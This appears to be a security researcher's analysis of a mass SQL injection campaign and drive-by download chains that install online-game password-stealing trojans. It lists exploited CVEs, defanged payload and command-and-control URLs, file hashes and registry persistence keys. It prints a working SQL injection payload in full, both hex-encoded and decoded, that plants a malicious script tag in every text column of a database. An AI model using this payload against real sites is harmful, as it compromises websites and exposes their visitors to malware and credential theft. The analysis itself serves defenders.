1.htm returns 4 IFRAMEs to exploit code (Yahoo.php, Ms07004.htm, Ajax.htm, Ms06014.htm). The code attempts to exploit MS06-014 (MDAC) and MS07-004 (VML) vulnerabilities. The payload for all of the exploits is http: //61[dot]188[dot]39[dot]214/1.exe, which is detected as a Infostealer.Onlinegame (Symantec) variant.

malware analysis:

Filename: 1.exe
MD5: 611D5549A73E1212D2F09F91A5004654
Size: 69632 bytes

1.exe creates:

C:\WINDOWS\system32\sonp32drv.dll

Filename: sonp32drv.dll
MD5: 7C73E2EB43D1C5A98A9DD3623188B2CE
Size: 45056 bytes

The following registry keys are created:

HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\sonp32drv.dll
HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}"
Type: REG_SZ

The malware deletes c:\WINDOWS\system32\drivers\etc\hosts

The malware sends exfiltrated data to 61.188.39.214 (China) TCP port 2034.

winzipices.cn SQL injection

Mass SQL injection attacks continue....

SQL Injection:

Injected SQL statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F00770069006E007A006900700069006300650073002E0063006E002F0033002E006A00730022003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S)

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''script src="http: //winzipices[dot]cn/3.js" script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The SQL injection appears to come from the automated CLI/SQL injection tool referenced at SANS. The user-agent utlilized during injection was: Mozilla/3.0+(compatible;+Indy+Library)

winzipices.cn site code:
injected script: http: //winzipices[dot]cn/3.js

3.js returns iframe for http: //winzipices[dot]cn/3.asp

3.asp returns iframes for pp.htm and s.asp and a tracking script for http: //s126[dot]cnzz[dot]com/stat.php?id=888134&web_id=888134&show=pic1

pp.htm returns script reference for pp.js

pp.js does a browser check. IE6 goes to 6.gif, IE7 goes to 7.gif

6.gif returns a script reference for vv.js and iframes for le.gif, old.gif and xin.gif

7.gif returns iframes for old.gif and xin.gif

le.gif and vv.js return MDAC (MS06-014) exploit
old.gif returns RealPlayer exploit (CVE-2007-5601)
xin.gif returns RealPlayer exploit (CVE-2008-1309)

Payload for all is: http: //61[dot]188[dot]38[dot]158/images/test.exe

malware analysis:

Filename: test.exe
MD5: afdb42512a91ae960d07397226f24494
Size: 27.5 KB (28,237 bytes)

The file test.exe copies itself as c:\WINDOWS\Tasks\0x01xx8p.exe and hooks itself into spoolsv.exe

receives instructions from http: //766598[dot]com/config.txt (222.187.105.196).

GET /config.txt HTTP/1.1
User-Agent: Downing
Host: 766598.com
Cache-Control: no-cache

config.txt returns commands for several connections:
http: //61[dot]188[dot]38[dot]158/images/test.exe
http: //winzipices[dot]cn/1.exe
http: //766598[dot]com/tongji/post.asp

new test.exe:
Filename: test.exe
MD5: 8ca53bf2b7d8107d106da2da0f8ca700
Size: 27.5 KB (28,237 bytes)

Filename: 1.exe (PSW.OnlineGames trojan)
MD5: 5c9322a95aaafbfabfaf225277867f5b
Size: 37.5 KB (38,400 bytes)

1.exe creates 3 tmp files: datx.tmp (x = number) with hooks into winlogin.exe

Filename: dat6.tmp
MD5: 96ee4d2d791d123c87692a5e838ed549
Size: 12.0 KB (12,288 bytes)

Filename: dat7.tmp
MD5: 9473d4397a0793c709a4ec365fb3f0d3
Size: 21.5 KB (22,016 bytes)

Filename: dat8.tmp
MD5: 69d308d862fefa4548d87545b387dda9
Size: 6.50 KB (6,656 bytes)

Registry:
HKEY_CLASSES_ROOT\CLSID\{E25C29AB-12B9-4523-A53C-324B5FBA648C}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp
Data:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\WINDOWS\System32\shell32.dll",Control_RunDLL "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"

...all in an effort to drop a PSW.OnlineGames trojan